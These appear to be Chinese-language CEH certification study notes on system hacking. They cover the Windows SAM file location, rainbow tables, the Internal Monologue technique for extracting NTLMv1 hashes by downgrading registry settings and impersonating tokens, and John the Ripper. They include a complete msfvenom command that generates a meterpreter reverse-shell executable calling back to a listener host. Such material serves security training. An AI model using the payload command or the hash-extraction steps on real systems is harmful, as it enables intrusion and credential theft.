CEH hacking Methodology(CHM)系統駭客流程有四個步驟
System Hacking Goals
windows 密碼表SAM存放路徑
c:\windows\system32\config\SAM 常在偷改密碼的人應該都很熟XD
他其實也是字典檔攻擊,只是他的字典已經轉成加密的md5等的對照表資料
“內心獨白”(Internal Monologue)是一種攻擊技術,駭客可以提取所有已登錄用户的NTLMv1 hashes。
1.因為windows10禁止使用NetNTLMv1,所以駭客更改註冊表設定以強制電腦使用NTLMv1而不用NTLMv2。 此步骤需要管理者權限。
2.然後就可以透過進程去找非網路登錄(non-network login) tokens的列表
3.用此tokens模擬用户同 NTLM SSP 進行交互,控制 Challenge 为固定值,導出返回的 Net-NTLMv1 。
生成 Shellcode 並獲得 Shell 訪問權限
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe
John The Ripper是一個免費的密碼破解工具。它最初為Unix作業系統開發,但可以在十五種不同的平台上運行。它是最常用的密碼測試和破解程序之一